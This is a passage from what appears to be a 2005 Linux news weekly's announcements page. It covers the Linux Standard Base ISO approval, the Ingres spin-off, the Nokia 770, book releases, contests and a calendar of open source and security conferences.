NewsForge reports that the Linux Standard Base is slated to become an ISO standard. "An international organization is preparing to publish its approval of the Linux Standard Base (LSB) as a worldwide standard, which could potentially lead to easier migration to and software development for Linux. The nonprofit Free Standards Group (FSG) announced at the Open Source Business Conference in Boston this week that the International Standardization Organization (ISO) and the International Electrotechnical Commission (IEC) unanimously approved the FSG's Linux Standard Base Core Specification 2.0.1 and is expected to publish the standard in December."

Comments (7 posted)

Page editor: Forrest Cook

Announcements

Non-Commercial announcements

EFF: File-Sharing Lawsuits Fail to Deter P2P Downloaders

The Electronic Frontier Foundation has sent out a Media Release concerning the effectiveness of lawsuits against users of peer-to-peer technology. ""Out of the millions of people who download music from P2P systems every day, the RIAA arbitrarily picks a few hundred to sue every month," said EFF Senior Staff Attorney Fred von Lohmann. "Many of those families suffer severe financial hardship. But despite all the publicity, studies show that P2P usage is increasing instead of decreasing.""

Full Story (comments: none)

Commercial announcements

CA spins off Ingres

Computer Associates has announced that the Ingres relational database has been spun off into a separate corporation. "As an independent entity, Ingres will focus exclusively on the development dynamics and business opportunities associated with the open source market. The divestiture will also enable CA to focus on its core strategic markets, which include systems and security management for the enterprise." The new company plans to become "the leading open source database supplier."

Comments (7 posted)

Ubuntu certified for IBM's DB2

Canonical Ltd. has announced that Ubuntu has achieved IBM certification that DB2 Universal Database for Linux operates in the Ubuntu environment. In addition to the core Ubuntu system, the certification includes the KDE-based Kubuntu and the education focused Edubuntu.

Comments (7 posted)

LPI appoints Regional Manager for Latin America

The Linux Professional Institute has announced the appointment of Jose Carlos Rodrigues Gouveia as the Regional Manager for Latin America.

Full Story (comments: none)

Micro Center Computer Stores Across the US Devote Floor Space, Staff to Desktop Linux

Micro Center and Linspire, Inc. have announced that Micro Center stores will have new desktop Linux sections within each of its locations to meet growing consumer demand. The Linux section of the store will feature desktop Linux software products, pre-installed desktops and laptops (with Linspire), and Linux-compatible peripherals. Micro Center operates 19 stores in the US.

Comments (5 posted)

Nokia 770 Internet Tablet Starts Shipping

Nokia has announced the first deliveries of its Nokia 770 terminal product. "The Nokia 770 Internet Tablet features an impressive high-resolution widescreen display (4.13") with zoom and on-screen keyboard, ideal for viewing online content. Aside from Wi-Fi, the device can also connect to the Internet utilising Bluetooth wireless technology via a compatible mobile device. The device runs on Linux based Nokia Internet Tablet 2005 software edition which is based on popular desktop Linux and Open Source technologies."

Comments (none posted)

VA Linux releases SMTPGuard anti-spam software

VA Linux has announced its new SMTPGuard Anti-Spam software. "VA Linux Systems Japan K.K. (VA Linux), a leading provider of Linux solutions for the telecommunications and enterprise systems markets, today announced the release of 'SMTPGuard', an Open Source, anti-SPAM software for MTAs, which can eliminate unsolicited e-mails (SPAM) flexibly. SMTPGuard is a part of 'VA FMS' (VA FlexMessaging Solution), VA Linux's total messaging solution."

Full Story (comments: none)

New Books

Nessus, Snort, and Ethereal Power Tools--latest release from Syngress

Syngress has published the book Nessus, Snort, & Ethereal Power Tools by Jay Beale.

Full Story (comments: none)

Open Sources 2.0: The Continuing Evolution - O'Reilly's Latest Release

O'Reilly has published the book Open Sources 2.0: The Continuing Evolution by Chris DiBona, Danese Cooper, and Mark Stone.

Full Story (comments: none)

Resources

FSF Europe Newsletter

The November 7, 2005 edition of the Free Software Foundation Europe Newsletter is online with the latest FSFE news.

Full Story (comments: none)

Towards Linux Desktop Comfort

Dan Kegel has put together his thoughts on what the Linux desktop needs to support the "average Joe". "Here are a few areas where Linux's comfort level needs to be raised before it can thrive on the desktop, plus links to ongoing work in these areas: Rapid Startup; Usability; Accessibility; Pre-Adaptation; Legacy Software Support; Fragmentation; Availability; Patent and Copyright Fears; Peer Support; Wireless; Plugability; Dogfood."

Comments (1 posted)

Contests and Awards

Firefox 100M Downloads Image Contest Winners (MozillaZine)

MozillaZine covers the winners of the Firefox 100 Million Downloads Celebration Image contest. "Asa Dotzler writes: "We've awarded prizes to the best photos submitted in the Firefox 100 Million Downloads Celebration Image contest." Visitors to Spread Firefox were asked to send photographs of themselves posing with the 100 million Firefox downloads celebration page. Over 200 photos were submitted."

Comments (none posted)

Extend Firefox Contest Announced (MozillaZine)

MozillaZine has announced the Extend Firefox contest. "The Extend Firefox contest, sponsored by Alienware and O'Reilly, asks entrants to submit new or upgraded extensions for Firefox 1.5, with extensions that take advantage of new features in 1.5 particularly welcome. Prizes will be awarded in eleven categories".

Comments (none posted)

Surveys

KOffice Meets the Users (KDE.News)

KDE.News queries Koffice users. "Are you using KOffice? What are you using KOffice for? Why did you decide to use KOffice? What are your main problems? We want to know who uses KOffice and we are especially interested in companies and people using KOffice applications in the course of their business. We have done usability testing with OpenUsability on some of the KOffice programs and will be working more with them. Now we want to reach our users directly and ask them what they think."

Comments (none posted)

Upcoming Events

Alliance Developer Days

A series of Itanium Developer Days will be held in Northern California, Japan, and Germany from November through February. "These two and a half day events include an Itanium-focused general session as well as hands on Microsoft Windows and Linux application porting labs. Alliance member representatives from Founding Sponsor companies will provide the best technical assistance and porting tools available to enable port completions at the event."

Comments (none posted)

Black Hat Federal and Europe CFP and Registration now open

Two calls for papers have gone out for the Black Hat Federal 2006 and Black Hat Europe 2006 security conferences. The US event will take place in Washington, D.C. on January 23-26, 2006 and the European event will take place in Amsterdam on February 28-March 3, 2006.

Full Story (comments: none)

EUSec London CFP and PacSec Tokyo announcements

A call for papers has gone out for EUSecWest/core06, the event takes place on February 20-21, 2006 in London, England.

Also, the PacSec/core05 Conference will take place in Tokyo, Japan on November 14-16, 2005.

Full Story (comments: none)

Security Highlights USENIX LISA Conference

USENIX has sent out a press release about the 19th Large Installation System Administration (LISA) Conference. "With security a priority for system and network administrators, LISA '05 offers a broad selection of training classes on security-related topics including Linux security and network incidence response; refereed papers showcasing state-of-the-art work on security and access controls, and invited talks by luminaries on subjects ranging from vulnerabilities through wireless security to firewalls." The event takes place on December 4-9, 2005 in San Diego, CA.

Comments (none posted)

2005 Open Source Forum

The 2005 Open Source Forum will be held on December 13-15, 2005 at the RiverCentre in St. Paul, Minnesota. "The Open Source Forum is an annual educational and collaborative event designed to bring together the public and private sectors, associations, educators and individuals involved in the research, development, education and deployment of open source software."

Full Story (comments: none)

Open Source Orgs Invited to Fourth Annual SoCal Linux Expo (LinuxMedNews)

LinuxMedNews promotes the SCALE conference. "Looking for an effective way to tell your product story and demonstrate its latest features to both new users as well as Linux veterans? Join other prestigious members of the Open Source community as they combine forces at the preeminent Linux exposition in the West. The fourth annual Southern California Linux Expo brings together businesses, academic institutions and the Linux community in Los Angeles on February 11-12, 2006."

Comments (none posted)

Registration Opens for O'Reilly Emerging Telephony Conference

O'Reilly has announced the registration for the first O'Reilly Emerging Telephony Conference. The event will take place on January 24-26, 2006 at the San Francisco Airport Marriott in San Francisco, CA.

Full Story (comments: none)

Events: November 10, 2005 - January 5, 2006

Date Event Location
November 10 - 11, 2005Ubuntu Below Zero(downtown Holiday Inn)Montreal, Canada
November 10, 2005Forum PHP Paris 2005Paris, France
November 12 - 18, 2005SC|05(Washington State Convention and Trade Center)Seattle, WA
November 13 - 15, 2005Firebird Conference 2005(Hotel Olsanka)Prague, Czech Republic
November 15 - 18, 2005Embedded Technology 2005(ET2005)Yokohama, Japan
November 15 - 17, 2005LinuxWorld GermanyFrankfurt, Germany
November 15 - 16, 2005PacSec/core05 conferenceTokyo, Japan
November 18, 2005European Gentoo developer meetingSchloss Kransberg, Germany
November 20 - 23, 20055tas Jornadas Regionales de Software LibreRosario, Santa Fe, Argentina
November 29 - December 2, 2005FOSS.IN/2005(Bangalore Palace)Bangalore, India
December 4 - 9, 2005Large Installation System Administration Conf.(LISA)San Diego, CA
December 5 - 7, 2005Open Source Developers' Conference(OSDC)(Monash University's Caulfield campus)Melbourne, Australia
December 27 - 30, 200522nd Chaos Communication CongressBerlin, Germany

Comments (none posted)

Web sites

The expanding gimp web (GnomeDesktop)

GnomeDesktop.org mentions the latest new web sites for the GNU Image Manipulation Program (GIMP). "paths.gimp.org is a collection of news from the world of free art software. in particular from the people who are going to be attending the Libre Graphics Meeting next year. layers.gimp.org is a collection of GIMP developers with blogs. pixels.gimp.org is a collection of GIMP users with blogs."

Comments (none posted)

Audio and Video programs

The Community of Web 2.0 (O'ReillyNet)

O'Reilly has announced a new podcast program. "In this 48-minute audio program from the Web 2.0 conference, Tim O'Reilly speaks with Sun Microsystems COO Jonathan Schwartz and Mozilla Foundation president Mitchell Baker about developer communities, distribution, architectures and expandability, and the value of open source."

Comments (none posted)

Page editor: Forrest Cook

Copyright © 2005, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds